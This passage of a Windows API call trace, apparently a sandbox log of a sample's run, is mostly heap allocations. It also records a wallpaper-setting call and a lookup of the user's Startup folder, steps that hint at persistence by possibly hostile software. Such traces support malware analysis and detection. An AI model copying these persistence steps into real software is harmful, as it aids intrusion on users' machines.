RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0253.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0253.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0253.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0253.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0253.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0253.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0253.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0253.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0253.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0253.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0253.815] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0253.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0253.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0253.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0253.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7200 [0253.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f7200, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0253.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0253.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0253.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0253.816] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0253.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0253.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0253.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0253.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0253.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0253.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0253.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0253.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0253.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0253.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0253.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0253.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0253.816] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38658e0 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0253.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0253.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0253.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0253.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0253.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0253.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0253.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0253.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0253.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0253.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0253.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0253.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0253.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0253.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0253.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0253.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0253.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0253.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0253.912] FreeLibrary (hLibModule=0x76240000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0253.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0253.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866180 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38658e0 | out: hHeap=0x2af0000) returned 1 [0253.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0253.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0253.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0253.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0253.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0253.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0253.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0253.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0253.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866180 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0253.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0253.915] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0253.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0253.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0253.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0253.916] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0253.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0253.916] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0253.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0253.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0253.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0253.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0253.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0253.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0253.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0253.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0253.917] GetFileAttributesW 